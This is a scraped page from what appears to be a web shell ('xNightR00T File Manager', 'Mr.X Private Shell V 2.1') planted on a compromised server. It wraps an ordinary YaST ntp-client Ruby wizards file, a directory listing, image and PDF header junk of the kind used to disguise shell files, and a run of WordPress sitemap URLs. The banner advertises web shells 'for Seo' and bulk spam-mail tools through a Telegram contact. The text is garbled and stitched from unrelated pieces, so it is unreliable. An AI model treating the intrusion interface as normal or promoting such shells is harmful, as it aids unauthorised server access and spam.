xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# File:	include/ntp-client/wizards.ycp
# Package:	Configuration of ntp-client
# Summary:	Wizards definitions
# Authors:	Jiri Srain <jsrain@suse.cz>
#
# $Id$
module Yast
  module NtpClientWizardsInclude
    def initialize_ntp_client_wizards(include_target)
      Yast.import "UI"

      textdomain "ntp-client"

      Yast.import "Wizard"
      Yast.import "Label"
      Yast.import "Sequencer"

      Yast.include include_target, "ntp-client/dialogs.rb"
    end

    # Complex workflow of the ntp-client configuration
    # @return sequence result
    def ComplexSequence
      aliases = {
        "main"                 => lambda { MainDialog() },
        "type_select"          => lambda { TypeSelectDialog() },
        "server"               => lambda { ServerDialog() },
        "server_select_local"  => lambda { LocalServerSelectionDialog() },
        "server_select_public" => lambda { PublicServerSelectionDialog() },
        "peer"                 => lambda { PeerDialog() },
        "clock"                => lambda { RadioDialog() },
        "fudge"                => lambda { FudgeDialog() },
        "bcast"                => lambda { BCastDialog() },
        "bcastclient"          => lambda { BCastClientDialog() },
        "store_record"         => [lambda { StoreRecord() }, true]
      }

      sequence = {
        "ws_start"             => "main",
        "main"                 => {
          abort:       :abort,
          next:        :next,
          peer:        "peer",
          server:      "server",
          clock:       "clock",
          bcast:       "bcast",
          bcastclient: "bcastclient",
          add:         "type_select"
        },
        "type_select"          => {
          abort:       :abort,
          peer:        "peer",
          server:      "server",
          clock:       "clock",
          bcast:       "bcast",
          bcastclient: "bcastclient"
        },
        "peer"                 => { abort: :abort, next: "store_record" },
        "server"               => {
          abort:         :abort,
          next:          "store_record",
          select_local:  "server_select_local",
          select_public: "server_select_public"
        },
        "server_select_local"  => {
          abort: :abort,
          next:  "server",
          back:  "server"
        },
        "server_select_public" => {
          abort: :abort,
          next:  "server",
          back:  "server"
        },
        "clock"                => {
          abort: :abort,
          next:  "store_record",
          fudge: "fudge"
        },
        "fudge"                => { abort: :abort, next: "clock" },
        "bcast"                => { abort: :abort, next: "store_record" },
        "bcastclient"          => { abort: :abort, next: "store_record" },
        "store_record"         => { abort: :abort, next: "main" }
      }

      ret = Sequencer.Run(aliases, sequence)

      ret
    end

    # The simple workflow for the NTP client
    # @return sequence result
    def SimpleSequence
      NtpClient.selected_record = {
        "type"    => "__clock",
        "address" => "127.127.3.2"
      }

      aliases = {
        "switcher"             => [lambda { SelectConfigType() }, true],
        "simple_pre"           => [lambda { SimpleDialogPrepare() }, true],
        "simple"               => lambda { SimpleDialog() },
        "simple_post"          => [lambda { SimpleDialogFinish() }, true],
        "server_select_local"  => lambda { LocalServerSelectionDialog() },
        "server_select_public" => lambda { PublicServerSelectionDialog() },
        "complex"              => lambda { ComplexSequence() }
      }

      sequence = {
        "ws_start"             => "switcher",
        "switcher"             => {
          simple:  "simple_pre",
          complex: "complex"
        },
        "simple_pre"           => { abort: :abort, next: "simple" },
        "simple"               => {
          abort:         :abort,
          next:          "simple_post",
          complex:       "complex",
          select_local:  "server_select_local",
          select_public: "server_select_public"
        },
        "simple_post"          => { abort: :abort, next: :next },
        "server_select_local"  => {
          abort: :abort,
          next:  "simple",
          back:  "simple"
        },
        "server_select_public" => {
          abort: :abort,
          next:  "simple",
          back:  "simple"
        },
        "complex"              => { abort: :abort, next: :next }
      }

      ret = Sequencer.Run(aliases, sequence)

      ret
    end

    # Whole configuration of ntp-client
    # @return sequence result
    def NtpClientSequence
      aliases = {
        "read"  => [lambda { ReadDialog() }, true],
        "main"  => lambda { SimpleSequence() },
        "write" => [lambda { WriteDialog() }, true]
      }

      sequence = {
        "ws_start" => "read",
        "read"     => { abort: :abort, next: "main" },
        "main"     => { abort: :abort, next: "write" },
        "write"    => { abort: :abort, next: :next }
      }

      Wizard.CreateDialog
      Wizard.SetDesktopTitleAndIcon("ntp-client")
      ret = Sequencer.Run(aliases, sequence)

      UI.CloseDialog
      ret
    end

    # Autoyast configuration of ntp-client
    # @return sequence result
    def NtpClientAutoSequence
      aliases = { "main" => lambda { ComplexSequence() } }

      sequence = {
        "ws_start" => "main",
        "main"     => { abort: :abort, next: :next }
      }

      # dialog caption
      caption = _("NTP Client Configuration")
      # label
      contents = Label(_("Initializing ..."))

      Wizard.CreateDialog
      Wizard.SetDesktopTitleAndIcon("ntp-client")
      Wizard.SetContentsButtons(
        caption,
        contents,
        "",
        Label.BackButton,
        Label.NextButton
      )

      ret = Sequencer.Run(aliases, sequence)

      UI.CloseDialog
      ret
    end
  end
end

Filemanager

Name Type Size Permission Actions
clocktypes.rb File 7.71 KB 0644
commandline.rb File 11.28 KB 0644
dialogs.rb File 19.95 KB 0644
helps.rb File 12.9 KB 0644
misc.rb File 8.17 KB 0644
widgets.rb File 57.51 KB 0644
wizards.rb File 5.89 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml